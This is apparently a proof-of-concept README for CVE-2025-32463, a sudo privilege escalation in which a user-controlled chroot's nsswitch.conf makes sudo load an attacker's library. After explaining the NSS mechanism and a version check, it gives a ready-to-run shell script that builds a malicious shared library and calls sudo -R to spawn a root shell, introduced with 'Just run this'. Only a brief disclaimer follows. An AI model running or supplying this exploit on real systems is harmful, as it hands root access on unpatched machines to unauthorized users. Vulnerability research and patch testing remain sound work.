Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.# CVE-2025-32463
This repository contains an educational proof-of-concept (PoC) exploit for CVE-2025-32463, a critical privilege escalation vulnerability in the sudo command. The vulnerability allows a local user to gain root privileges on affected systems.
## CVE ID: CVE-2025-32463
- Type: Local Privilege Escalation (LPE)
- CVSS v3.1 Score: 9.3 (Critical) - `AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
- Vendor: Sudo Project
- Affected Versions: Sudo versions prior to `1.9.17p1`
The vulnerability exists in the -R (--chroot) option of sudo. When this option is used with a user-controlled directory, sudo incorrectly trusts the `nsswitch.conf` file from within that chroot jail. This allows an attacker to specify a malicious shared library for the Name Service Switch (NSS) mechanism to load, resulting in code execution with root privileges.
The sudo command needs to resolve user and group identities. To do this, it uses the Name Service Switch (NSS) mechanism, which is configured by the /etc/nsswitch.conf file. This file specifies which libraries (e.g., libnss_files.so.2, libnss_systemd.so.2) should be used to look up different types of information (passwords, groups, hosts, etc.).
When the -R or --chroot option is used, sudo changes its root directory to the specified path before executing the command. The vulnerability is that sudo would then read the nsswitch.conf file from within this new chroot environment ($CHROOT/etc/nsswitch.conf) instead of using the trusted host system's /etc/nsswitch.conf.
## Testing Vulnerability
This is the fastest and safest way to check. It tries to use the `-R` option in a way that will fail, and you learn from the type of error message.
```
sudo -R nonexistent_directory nonexistent_command
```
If your system is VULNERABLE, you will see an error like this:
```bash
sudo: nonexistent_directory: No such file or directory
```
If your system is PATCHED, you will see an error like this:
```bash
sudo: you are not permitted to use the -R option with nonexistent_command
```
## Exploitation
Just run this in your terminal:
```bash
STAGE=$(mktemp -d /tmp/exploit.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > exploit.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void exploit(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);
}
EOF
# Create the chroot structure AND a lib directory inside it
mkdir -p exploit/etc exploit/lib
echo "passwd: /exploit123" > exploit/etc/nsswitch.conf
cp /etc/group exploit/etc
# Compile the library directly into the chroot's ./lib folder
gcc -shared -fPIC -Wl,-init,exploit -o exploit/lib/exploit123.so.2 exploit.c
echo "Pwned!"
sudo -R exploit exploit123
```
Disclaimer: This information is provided for educational and security testing purposes only. Use only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
登录后查看神龙缓存的 POC 文件快照
登录查看